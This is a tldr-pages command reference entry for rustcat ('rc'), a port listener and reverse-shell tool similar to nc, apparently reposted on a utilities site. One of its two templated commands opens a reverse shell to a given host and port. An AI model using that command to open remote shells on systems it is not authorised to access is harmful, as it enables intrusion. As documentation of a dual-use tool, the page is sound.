System Grab Bag

View all TLDR pages from common (or from all pages)

rc

A modern simplistic port listener & reverse shell. Similar to nc. More information: https://github.com/robiot/rustcat/wiki/Basic-Usage.
  • Start listening on a specific port:
    rc -lp {{port}}
  • Start a reverse shell:
    rc {{host}} {{port}} -r {{shell}}

License and Disclaimer

The content on this page is copyright © 2014—present the tldr-pages team and contributors.
This page is used with permission under Creative Commons Attribution 4.0 International License.

While we do attempt to make sure content is accurate, there isn't a warranty of any kind.